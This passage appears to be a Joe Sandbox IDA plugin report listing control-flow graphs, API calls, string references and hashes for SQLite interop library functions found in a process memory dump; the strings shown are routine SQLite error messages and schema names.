                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB1102B9B002248FCB88EB79E1516AA77F3EBC82567604669C109CB358DA3599439F80

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 6bcdce00-6bcdce1b 1 6bcdce1d-6bcdce44 SI769271af19a2299d 0->1 2 6bcdce45-6bcdce4e call 6bcc5630 0->2 5 6bcdd31a-6bcdd320 2->5 6 6bcdce54-6bcdce5e 2->6 7 6bcdce64-6bcdce69 6->7 8 6bcdce60-6bcdce62 6->8 10 6bcdce6f-6bcdce79 7->10 11 6bcdce6b-6bcdce6d 7->11 9 6bcdce82-6bcdce87 8->9 13 6bcdce89-6bcdce8e 9->13 14 6bcdce90-6bcdce96 9->14 10->9 12 6bcdce7b 10->12 11->9 12->9 15 6bcdce9d-6bcdceab 13->15 14->15 16 6bcdce98 14->16 17 6bcdcead-6bcdceb4 15->17 18 6bcdcf1b-6bcdcf2f 15->18 16->15 19 6bcdceb6-6bcdcebd 17->19 20 6bcdcec0-6bcdced9 call 6bc12f30 17->20 25 6bcdcee9-6bcdceeb 18->25 19->20 28 6bcdcedb-6bcdcee2 20->28 29 6bcdcee5 20->29 26 6bcdceed-6bcdcef9 call 6bbd5eb0 25->26 27 6bcdcefc-6bcdcf04 25->27 26->27 31 6bcdcf0a-6bcdcf0c 27->31 32 6bcdd2c1-6bcdd2cf SIccd01f4d70f48acf 27->32 28->29 29->25 34 6bcdcf0e-6bcdcf15 31->34 35 6bcdcf56-6bcdcf5b 31->35 36 6bcdd2eb-6bcdd2ed 32->36 37 6bcdd2d1-6bcdd2e9 call 6bc87000 32->37 43 6bcdcf17-6bcdcf19 34->43 44 6bcdcf31-6bcdcf39 34->44 41 6bcdcf5d-6bcdcf64 35->41 42 6bcdcf67-6bcdd099 call 6bc52870 * 5 35->42 39 6bcdd2ef 36->39 40 6bcdd2f3-6bcdd2fa 36->40 37->40 39->40 46 6bcdd2fc-6bcdd308 call 6bc6f960 40->46 47 6bcdd30b-6bcdd318 call 6bc045c0 40->47 41->42 69 6bcdd2ac-6bcdd2b1 42->69 70 6bcdd09f-6bcdd0b4 42->70 49 6bcdcf3c-6bcdcf41 43->49 44->49 46->47 47->5 49->35 51 6bcdcf43-6bcdcf51 SIaa0f8e0c251cfd1d 49->51 57 6bcdd2ba 51->57 62 6bcdd2bd 57->62 62->32 69->62 73 6bcdd2b3 69->73 71 6bcdd0c6-6bcdd0e6 call 6bc19dc0 70->71 72 6bcdd0b6-6bcdd0c4 call 6bc52810 70->72 78 6bcdd0ea-6bcdd0ec 71->78 72->78 73->57 79 6bcdd0ee-6bcdd0f1 78->79 80 6bcdd127-6bcdd149 call 6bc85d80 78->80 82 6bcdd100-6bcdd122 call 6bc3df00 SIaa0f8e0c251cfd1d 79->82 83 6bcdd0f3-6bcdd0fd call 6bc293c0 79->83 87 6bcdd178-6bcdd19c call 6bc05950 call 6bc2f280 80->87 88 6bcdd14b-6bcdd150 80->88 82->69 83->82 103 6bcdd19e-6bcdd1b2 call 6bc30940 87->103 104 6bcdd1b4-6bcdd1f9 call 6bc05890 call 6bc2f280 87->104 91 6bcdd157-6bcdd15c 88->91 92 6bcdd152 88->92 94 6bcdd15e-6bcdd165 call 6bc12ea0 91->94 95 6bcdd16a-6bcdd173 call 6bc12770 91->95 92->91 94->69 105 6bcdd2aa 95->105 103->104 104->69 112 6bcdd1ff-6bcdd208 104->112 105->69 113 6bcdd20a-6bcdd215 call 6bc12770 112->113 114 6bcdd217 112->114 116 6bcdd21e-6bcdd230 call 6bcd6630 SIccd01f4d70f48acf 113->116 114->116 120 6bcdd24e-6bcdd253 116->120 121 6bcdd232 116->121 123 6bcdd27a-6bcdd27f call 6bc12770 120->123 124 6bcdd255-6bcdd25c call 6bc12ea0 120->124 122 6bcdd237-6bcdd23d 121->122 125 6bcdd23f-6bcdd241 122->125 126 6bcdd25e-6bcdd260 122->126 132 6bcdd283-6bcdd2a7 call 6bc13fa0 call 6bc6fbf0 123->132 124->132 133 6bcdd244-6bcdd24c 125->133 126->120 131 6bcdd262-6bcdd276 call 6bc40480 SIccd01f4d70f48acf 126->131 131->105 138 6bcdd278 131->138 132->105 133->120 133->122 138->132
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AFB6,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,6742C603,?), ref: 6BCDCE33
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BCDCEF4
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BCDCF44
                                                                                                                                                                                                                                      • SIccd01f4d70f48acf.SQLITE.INTEROP(00000000), ref: 6BCDD2C2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.Iaa0f8e0c251cfd1d.Iccd01f4d70f48acf._memset
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$BINARY$NOCASE$RTRIM$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$main$misuse$v
                                                                                                                                                                                                                                      • API String ID: 3155288359-813848819
                                                                                                                                                                                                                                      • Opcode ID: e92fcbdf5084e4b0c5c5994892140e89799fa79b82c6d99bf58857fd694492ee
                                                                                                                                                                                                                                      • Instruction ID: d02464fa4da7f2dfbd9154c9a21562cbc57f46a2231aa15538030b81e8f7ee78
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e92fcbdf5084e4b0c5c5994892140e89799fa79b82c6d99bf58857fd694492ee
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CE124B5D253019BEB00CF64C882B4B3BA4AF45718F0445A9EE199F346F73DDA15CBA2

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 769 6bc82770-6bc827b4 770 6bc827bb-6bc827cc 769->770 771 6bc827b6 769->771 772 6bc8290d-6bc8290f 770->772 773 6bc827d2-6bc827d7 770->773 771->770 774 6bc82915-6bc8291a 772->774 775 6bc82847-6bc82869 772->775 773->775 776 6bc827d9-6bc827db 773->776 774->775 777 6bc82920-6bc8292f 774->777 778 6bc8286f-6bc8287d call 6bc13b30 775->778 779 6bc82a40-6bc82a45 775->779 780 6bc8290b 776->780 781 6bc827e1-6bc827e3 776->781 782 6bc82931-6bc82940 call 6bc13b30 777->782 783 6bc82942-6bc82944 777->783 778->779 793 6bc82883-6bc828c9 call 6bbd5eb0 778->793 786 6bc82a50-6bc82a5b 779->786 787 6bc82a47-6bc82a4d SIaa0f8e0c251cfd1d 779->787 780->772 785 6bc827e6-6bc827eb 781->785 791 6bc82947-6bc8294c 782->791 783->791 785->785 790 6bc827ed-6bc827f8 785->790 787->786 794 6bc827fe-6bc8280c call 6bc13b30 790->794 795 6bc82904-6bc82906 790->795 791->786 796 6bc82952-6bc8296b 791->796 804 6bc82a88 793->804 805 6bc828cf-6bc828e5 call 6bbde330 793->805 799 6bc8281c-6bc82821 794->799 806 6bc8280e-6bc82819 call 6bbde330 794->806 795->799 807 6bc8298b-6bc8298d 796->807 808 6bc8296d-6bc82973 796->808 799->786 803 6bc82827-6bc8282c 799->803 809 6bc82830-6bc82835 803->809 810 6bc82a92-6bc82a94 804->810 823 6bc828eb-6bc828ff call 6bbde330 805->823 824 6bc82a5c 805->824 806->799 814 6bc82990-6bc82995 807->814 808->807 813 6bc82975-6bc82988 808->813 809->809 815 6bc82837-6bc82840 809->815 816 6bc82ab3 810->816 817 6bc82a96-6bc82ab1 call 6bbde330 810->817 813->807 814->814 820 6bc82997-6bc829a5 814->820 815->775 822 6bc82abd-6bc82abf 816->822 817->822 825 6bc829a8-6bc829ad 820->825 829 6bc82ac1-6bc82ac5 822->829 830 6bc82ad3-6bc82ae6 822->830 827 6bc82a5d-6bc82a86 call 6bbde330 823->827 824->827 825->825 826 6bc829af-6bc829c1 825->826 832 6bc829f9-6bc82a03 826->832 833 6bc829c3-6bc829c5 826->833 827->810 829->830 835 6bc82ac7-6bc82ad0 SIaa0f8e0c251cfd1d 829->835 837 6bc82aec-6bc82aef 830->837 838 6bc82bc6-6bc82be1 830->838 843 6bc82a2b-6bc82a3f SIaa0f8e0c251cfd1d 832->843 844 6bc82a05-6bc82a0e 832->844 839 6bc829c8-6bc829cd 833->839 835->830 837->838 845 6bc82af5-6bc82b15 837->845 841 6bc82c97 838->841 842 6bc82be7-6bc82bf9 call 6bc68990 838->842 839->839 847 6bc829cf-6bc829da 839->847 846 6bc82c9a-6bc82ca1 841->846 842->846 859 6bc82bff-6bc82c33 call 6bc00410 842->859 844->775 849 6bc82a14-6bc82a25 call 6bc527e0 844->849 850 6bc82b1e-6bc82b3f 845->850 851 6bc82cb2-6bc82cce call 6bc067f0 SIaa0f8e0c251cfd1d 846->851 852 6bc82ca3-6bc82cac 846->852 853 6bc829e0-6bc829e5 847->853 849->775 849->843 850->846 856 6bc82b45-6bc82b4c 850->856 852->851 853->853 857 6bc829e7-6bc829f1 853->857 861 6bc82b59-6bc82b5d 856->861 862 6bc82b4e-6bc82b57 856->862 857->833 864 6bc829f3-6bc829f6 857->864 859->846 872 6bc82c35-6bc82c62 859->872 867 6bc82b5f-6bc82b71 call 6bc06260 861->867 868 6bc82b84-6bc82ba3 call 6bc0df70 861->868 862->861 864->832 867->868 878 6bc82b73-6bc82b7f 867->878 880 6bc82bbf-6bc82bc3 868->880 881 6bc82ba5-6bc82bbd call 6bc0df70 868->881 875 6bc82c6b-6bc82c8f call 6bc06260 872->875 876 6bc82c64 872->876 886 6bc82ccf-6bc82cd3 875->886 887 6bc82c91-6bc82c95 875->887 876->875 878->868 883 6bc82b81 878->883 880->838 881->842 881->880 883->868 889 6bc82cdb 886->889 890 6bc82cd5-6bc82cd9 886->890 888 6bc82cdf-6bc82cff call 6bc60fc0 887->888 889->888 890->888 890->889
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC82887
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,00000001,00000000,?,?,?,?,?,?,6BC86215), ref: 6BC82ACB
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,00000001,00000000), ref: 6BC82CBE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.$_memset
                                                                                                                                                                                                                                      • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                      • API String ID: 1480580083-4201244970
                                                                                                                                                                                                                                      • Opcode ID: 001026d0e44b4ab091d5a4c48c7e1371ddb8119533712eaadfa043d1c69a6767
                                                                                                                                                                                                                                      • Instruction ID: 4403868363b17ad47b5ed51f1c2396e0714f5cac94915a63108bb99d02b2fbbd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 001026d0e44b4ab091d5a4c48c7e1371ddb8119533712eaadfa043d1c69a6767
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F02D8B1E116169BDB04CF68C894BEABBB5BF44318F048169D8689B341F739EA05CBD1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIc14fb8a21feb2e94.SQLITE.INTEROP(6BC8DA3D,00000000,Function_000E6B00,?,00000000,6BC8DA3D,SELECT*FROM"%w".%s ORDER BY rowid,?,?), ref: 6BCC1867
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • sqlite_temp_master, xrefs: 6BCC138C
                                                                                                                                                                                                                                      • table, xrefs: 6BCC137F
                                                                                                                                                                                                                                      • unsupported file format, xrefs: 6BCC17D7
                                                                                                                                                                                                                                      • sqlite_master, xrefs: 6BCC1397
                                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 6BCC1727
                                                                                                                                                                                                                                      • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6BCC183C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Ic14fb8a21feb2e94.
                                                                                                                                                                                                                                      • String ID: SELECT*FROM"%w".%s ORDER BY rowid$attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$table$unsupported file format
                                                                                                                                                                                                                                      • API String ID: 3249223497-2450480176
                                                                                                                                                                                                                                      • Opcode ID: 0f1851fdd5529d18e884a4743cabd659f355194d3b20add806cec4d7874c08c5
                                                                                                                                                                                                                                      • Instruction ID: 7342e266d0a3b618637c184df3f4b5484303699f48b9f4fb748f02166fcbb616
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f1851fdd5529d18e884a4743cabd659f355194d3b20add806cec4d7874c08c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D128F70A297518FD700CF2AC08071BBBE1BF95318F14899DE8998B351E779EA45CB93

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1067 6bcc0600-6bcc0613 1068 6bcc061c-6bcc0624 1067->1068 1069 6bcc0615-6bcc061a 1067->1069 1071 6bcc065f-6bcc0664 1068->1071 1072 6bcc0626 1068->1072 1070 6bcc062b-6bcc065e SI769271af19a2299d * 2 1069->1070 1073 6bcc0666-6bcc066d 1071->1073 1074 6bcc0670-6bcc0671 call 6bcc0420 1071->1074 1072->1070 1073->1074 1077 6bcc0676-6bcc067e 1074->1077 1078 6bcc0684 1077->1078 1079 6bcc0723-6bcc072c 1077->1079 1082 6bcc068a-6bcc0694 1078->1082 1080 6bcc072e-6bcc0735 1079->1080 1081 6bcc0738-6bcc0740 1079->1081 1080->1081 1082->1079 1083 6bcc069a-6bcc06a6 call 6bcb82c0 1082->1083 1087 6bcc06ce-6bcc06e8 call 6bc43690 1083->1087 1088 6bcc06a8-6bcc06b3 call 6bc97aa0 1083->1088 1095 6bcc06ea-6bcc06ee call 6bc07640 1087->1095 1096 6bcc06f3-6bcc06fb 1087->1096 1093 6bcc06bc-6bcc06ca call 6bcc0420 1088->1093 1094 6bcc06b5 1088->1094 1105 6bcc06cc 1093->1105 1106 6bcc0686 1093->1106 1094->1093 1095->1096 1099 6bcc06fd-6bcc0712 call 6bc1d5a0 call 6bc12ec0 1096->1099 1100 6bcc0714-6bcc071b 1096->1100 1101 6bcc0720 1099->1101 1100->1101 1101->1079 1105->1079 1106->1082
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,API called with finalized prepared statement,00000000,00000000,6BC8DA3D,?,6BC99755,?,?,?,?,?,6BC8DA3D,00000000,?), ref: 6BCC062D
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0001590B,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,6BC8DA3D,?,6BC99755,?,?,?,?,?,6BC8DA3D,00000000), ref: 6BCC064B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BCC0644
                                                                                                                                                                                                                                      • API called with NULL prepared statement, xrefs: 6BCC0615
                                                                                                                                                                                                                                      • API called with finalized prepared statement, xrefs: 6BCC0626
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCC0635
                                                                                                                                                                                                                                      • misuse, xrefs: 6BCC063F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-4004311192
                                                                                                                                                                                                                                      • Opcode ID: a01919684782cfde8c6f61046c37ccda4ffa0c6b6a8b3a0728195cb47e3cc54d
                                                                                                                                                                                                                                      • Instruction ID: ee943197d1fa4f14b20b7573a65a2444d7c6d1e7c485dbcd45e6cbb5a6f00327
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a01919684782cfde8c6f61046c37ccda4ffa0c6b6a8b3a0728195cb47e3cc54d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D631C5B1A287019BE300DF79AC41A5B73E4ABD5228F000579E959DB342FB2DDA0587E3

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1109 6bc97b50-6bc97b5b 1110 6bc97b5d-6bc97b63 1109->1110 1111 6bc97b64-6bc97b68 1109->1111 1112 6bc97b6a-6bc97b9b SI769271af19a2299d * 2 1111->1112 1113 6bc97b9c-6bc97ba1 1111->1113 1114 6bc97bad-6bc97bb4 1113->1114 1115 6bc97ba3-6bc97baa 1113->1115 1116 6bc97bc8-6bc97bdd call 6bc96850 call 6bc21e30 1114->1116 1117 6bc97bb6 1114->1117 1115->1114 1126 6bc97bdf-6bc97be3 1116->1126 1127 6bc97bf5-6bc97c0e call 6bc12ec0 call 6bc868b0 1116->1127 1120 6bc97bb8-6bc97bbf 1117->1120 1121 6bc97bc1-6bc97bc3 call 6bbfe260 1117->1121 1120->1116 1120->1121 1121->1116 1126->1127 1128 6bc97be5-6bc97be9 call 6bc868b0 1126->1128 1132 6bc97bee-6bc97bf4 1128->1132
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,API called with finalized prepared statement,?,6BC8DA3D,6BC8DAE9,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000,00000000,6BC8DA3D,?,6BC8DA3D), ref: 6BC97B71
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0001565C,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000015,API called with finalized prepared statement,?,6BC8DA3D,6BC8DAE9,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF), ref: 6BC97B8C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC97B85
                                                                                                                                                                                                                                      • API called with finalized prepared statement, xrefs: 6BC97B6A
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC97B76
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC97B80
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-170423033
                                                                                                                                                                                                                                      • Opcode ID: 3fd4ef4d6329ed295dac206f87a22826c6ba00b3c0c984908bcf26364fa5cb14
                                                                                                                                                                                                                                      • Instruction ID: f5dfb29401c886de9b0595d6fffaa3d944822f42aeb9bad3440d3dd1e5c3bcb7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fd4ef4d6329ed295dac206f87a22826c6ba00b3c0c984908bcf26364fa5cb14
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1117232B266149BFB10AEB8FC81B4A77549B40669F044077EA0CDB241EB79DA4453E1

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1244 6bc52a40-6bc52a4f 1245 6bc52c55-6bc52c73 SI769271af19a2299d 1244->1245 1246 6bc52a55-6bc52a59 1244->1246 1249 6bc52c78-6bc52c7e 1245->1249 1247 6bc52a65-6bc52a77 1246->1247 1248 6bc52a5b-6bc52a5f 1246->1248 1247->1245 1250 6bc52a7d-6bc52a8f 1247->1250 1248->1245 1248->1247 1250->1245 1251 6bc52a95-6bc52a9f 1250->1251 1251->1245 1252 6bc52aa5-6bc52aaf call 6bbf4ec0 1251->1252 1252->1245 1255 6bc52ab5-6bc52ad2 1252->1255 1256 6bc52b6d 1255->1256 1257 6bc52ad8 1255->1257 1258 6bc52b72-6bc52b88 call 6bc2c670 1256->1258 1257->1258 1259 6bc52adf-6bc52ae4 1257->1259 1260 6bc52ae9-6bc52b24 call 6bc52a40 1257->1260 1265 6bc52bd0-6bc52bd4 1258->1265 1266 6bc52b8a-6bc52b92 1258->1266 1259->1258 1260->1249 1267 6bc52b2a-6bc52b62 call 6bc52a40 1260->1267 1270 6bc52bd6-6bc52bda 1265->1270 1271 6bc52bdc-6bc52be8 call 6bc2c670 1265->1271 1266->1265 1268 6bc52b94-6bc52b9a 1266->1268 1267->1249 1276 6bc52b68-6bc52b6b 1267->1276 1268->1265 1274 6bc52b9c-6bc52ba3 1268->1274 1270->1271 1272 6bc52c4c-6bc52c54 1270->1272 1277 6bc52bed-6bc52bf4 1271->1277 1278 6bc52bc5-6bc52bce call 6bbf1da0 1274->1278 1279 6bc52ba5-6bc52bc4 call 6bc3df00 1274->1279 1276->1258 1280 6bc52bf6-6bc52bff 1277->1280 1281 6bc52c00-6bc52c10 call 6bc0dfd0 1277->1281 1278->1271 1288 6bc52c14-6bc52c27 1281->1288 1289 6bc52c12 1281->1289 1290 6bc52c2c-6bc52c4a 1288->1290 1291 6bc52c29 1288->1291 1289->1288 1290->1272 1291->1290
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AA59,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,00000000,00000001,?,?,6BC57E70,?,?,?,?,?), ref: 6BC52C6B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC52C64
                                                                                                                                                                                                                                      • unable to delete/modify user-function due to active statements, xrefs: 6BC52BA5
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC52C55
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC52C5F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
